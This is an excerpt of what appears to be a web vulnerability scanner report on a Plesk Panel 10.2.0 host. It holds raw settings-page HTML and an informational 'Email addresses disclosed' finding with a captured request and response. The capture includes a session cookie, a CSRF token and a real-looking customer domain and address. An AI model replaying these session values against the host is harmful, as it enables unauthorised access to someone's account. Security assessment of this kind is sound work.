   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokmål (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-ui_culture">UI Culture</label></td>
           <td>



   <select name="ui_culture" id="fid-ui_culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokmål (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Code Access Security</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-trust_level">CAS trust level</label></td>
           <td>



   <select name="trust_level" id="fid-trust_level" >    <option value='Full' SELECTED>Full</option>
   <option value='High'>High</option>
   <option value='Medium'>Medium</option>
   <option value='Low'>Low</option>
   <option value='Minimal'>Minimal</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Session Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-auth_mode">Authentication mode</label></td>
           <td>



   <select name="auth_mode" id="fid-auth_mode" >    <option value='Windows' SELECTED>Windows</option>
   <option value='Forms'>Forms</option>
   <option value='Passport'>Passport</option>
   <option value='None'>None</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-sess_timeout">Session timeout (minutes)</label></td>
           <td>





   <input type="text" name="sess_timeout" id="fid-sess_timeout" value="20"} size="15">





           </td>
       </tr>

   </table>

</td></tr></table></fieldset>


<input type="hidden" name="groupName" value="">
<input type="hidden" name="web_path" value="">

</div>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11. Email addresses disclosed
There are 13 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


11.1. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/1

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/edit/id/1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:49 GMT
Connection: close
Content-Length: 35725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-1@nosedivesailing.com - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F1' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1@nosedivesailing.com</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-1" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

